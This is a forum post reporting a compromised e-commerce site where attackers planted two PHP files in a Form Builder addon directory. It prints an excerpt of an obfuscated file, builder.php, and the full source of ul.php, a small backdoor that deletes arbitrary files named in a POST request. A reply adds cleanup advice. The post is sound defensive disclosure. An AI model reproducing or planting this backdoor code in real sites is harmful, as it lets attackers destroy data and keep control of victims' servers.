Form Builder Addon Hack - Cc#s Stolen

A client site has recently been hacked. Client is running version 2.0.11. Found client was hacked through the Form Builder addon. There are 2 additional files that have been injected into the addons/form_builder directory.



What to look for:

builder.php - This file contained roughly 4,500 lines of encrypted function code. This code looked like this:

<br />
<?php<br />
function b4ebde5bd7b7f()<br />
{<br />
for($pa5=159;$pa5<7367;$pa5--){if($pa5!=17877) break;}<br />
}<br />
function b4ebd1a37d330fc77f229e42d57171a8c012769()<br />
{<br />
for($pa5=11;$pa5<12019;$pa5-=1){if($pa5!=30749) break;}<br />
}<br />
function b4ebd620c393876e21cecd4871c9d872eb0c0d60b()<br />
{<br />
for($pa5=139;$pa5<7803;$pa5--){if($pa5!=12933) break;}<br />
}<br />
function b4ebd4b77176337f5777f66468795f68071daebbe9ff7f7ba8d0dd2()<br />
{<br />
for($pa5=55;$pa5<26731;$pa5-=243){if($pa5!=1749) break;}<br />
}<br />
function b4ebd68349246a3d168342a39f378dc9d3951c4dacc1ad4eff77f7d7()<br />
{<br />
for($pa5=141;$pa5<7483;$pa5-=1){if($pa5!=23333) break;}<br />
}<br />
function b4ebd8ffd163e7f1e6f0f1c35f7b0f9cc6b0b9e9361e3c7af070()<br />
{<br />
}<br />
function b4ebde83cb25a774bfdc00()<br />
{<br />
}<br />
function b4ebdf4204fe69eff9034c18b84367eec75da71f7bc11472()<br />
{<br />
}<br />
function b4ebdec3dcf77a377ced4d672e791db75fe702e213f0ee7ae()<br />
{<br />

```<br />
<br />
The second file found was [b]ul.php[/b]. This file had the following code:<br />
```php
<br />
<?php<br />
if (isset($_POST['link'])) {<br />
		$app_dir = get_app_root_dir();<br />
@unlink($app_dir . $_POST['link']);<br />
if (file_exists($app_dir . $_POST['link']))<br />
  echo "Failed!";<br />
else<br />
  echo "Unlinked!";<br />
}<br />
<br />
//<br />
function get_app_root_dir($max_deep = 30)<br />
{<br />
for($i=1; $i<=$max_deep; $i++)<br />
{<br />
	 $dir = getcwd();<br />
  if( file_exists($dir . "/config.local.php") )<br />
   return $dir.'/';<br />
<br />
  chdir('../');<br />
}<br />
return false;<br />
}<br />

```<br />
<br />
I recommend everyone check this addon for these files and remove the files immediately. I found this by combing through all recent traffic and found POST calls to the builder.php file coming from eastern block countries.

Removing the files alone will not solve the problem, as a matter of fact it will make the cleanup efferent all the more difficult.

You must first identify the point of entry, patch it and only then cleanup.

(if you remove the files before closing the point of entry, the attackers will be aware and will likely plant new files etc.)

Let me know if you need a hand with this.